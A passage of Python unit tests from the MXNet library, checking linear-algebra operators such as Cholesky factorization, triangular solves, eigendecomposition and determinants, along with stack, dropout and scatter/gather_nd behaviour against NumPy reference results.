os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
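# Illustrative-only sketch (not part of the original tests): for a plain m x m
# input, the mask built above is simply a lower- (or upper-) triangular matrix
# of ones, so the helper is the symbolic analogue of np.tril / np.triu. The
# function below is a hypothetical check and is not called by the test suite.
def _example_triangle_mask(m=3, lower=True):
    mask = np.tril(np.ones((m, m))) if lower else np.triu(np.ones((m, m)))
    a = mx.nd.random.uniform(shape=(m, m))
    expected = a.asnumpy() * mask
    sym = _make_triangle_symm(mx.sym.Variable('a'), ndims=2, m=m, lower=lower)
    out = sym.eval(ctx=mx.cpu(), a=a)[0].asnumpy()
    assert np.allclose(out, expected)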
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: have to symmetrize the input for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
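# Illustrative-only note (not part of the original tests): the reference value
# 10. * log(2.) in the final sumlogdiag check above comes from the diagonal of
# `pow`, [2, 4, 8, 16]: log(2) + log(4) + log(8) + log(16) = (1+2+3+4) * log(2).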
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as these tests need CUDA 8
# and MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
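# Illustrative-only note (not part of the original tests): in matrix form the
# reference backward above computes, for A = U^T diag(l) U with the rows of U
# being the eigenvectors,
#   grad_A = U^T (diag(grad_l) + F) U,
# where T = grad_U U^T, F[i, j] = (T[i, j] - T[j, i]) / (2 * (l[i] - l[j]))
# for i != j, and F[i, i] = 0. This matches the temp/temp2 computation in
# _syevd_backward step by step.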
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs CUDA 8
# and MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs CUDA 8
# and MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of a triangle by doing a full roundtrip, as the intermediate extracted
# triangle has a different ordering than numpy's.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
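# Illustrative-only sketch (not part of the original tests): the matrix
# determinant lemma behind the comment in test_laop_6,
#   det(I + v v^T) = 1 + v^T v >= 1,
# checked numerically with plain NumPy. The function below is a hypothetical
# helper and is not called by the test suite.
def _example_det_identity():
    v = np.random.random(4)
    a = np.eye(4) + np.outer(v, v)
    assert np.allclose(np.linalg.det(a), 1. + np.dot(v, v))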
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: the test fails intermittently when cuDNN is on; cuDNN is temporarily disabled until this gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure the input contains no zeroes (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# The relative error should stay within roughly ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@with_seed()
def test_dropout_reproducibility():
info = np.iinfo(np.int32)
seed1 = np.random.randint(info.min, info.max)
seed2 = np.random.randint(info.min, info.max)
data = mx.nd.ones((100, 100), ctx=default_context())
dropout = mx.gluon.nn.Dropout(0.5)
mx.random.seed(seed1)
with mx.autograd.record():
result1 = dropout(data)
result2 = dropout(result1)
mx.random.seed(seed2)
with mx.autograd.record():
result3 = dropout(data)
result4 = dropout(result3)
mx.random.seed(seed1)
with mx.autograd.record():
result5 = dropout(data)
result6 = dropout(result5)
assert_almost_equal(result1.asnumpy(), result5.asnumpy())
assert_almost_equal(result2.asnumpy(), result6.asnumpy())
with assert_raises(AssertionError):
assert_almost_equal(result1.asnumpy(), result2.asnumpy())
with assert_raises(AssertionError):
assert_almost_equal(result1.asnumpy(), result3.asnumpy())
with assert_raises(AssertionError):
assert_almost_equal(result2.asnumpy(), result4.asnumpy())
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
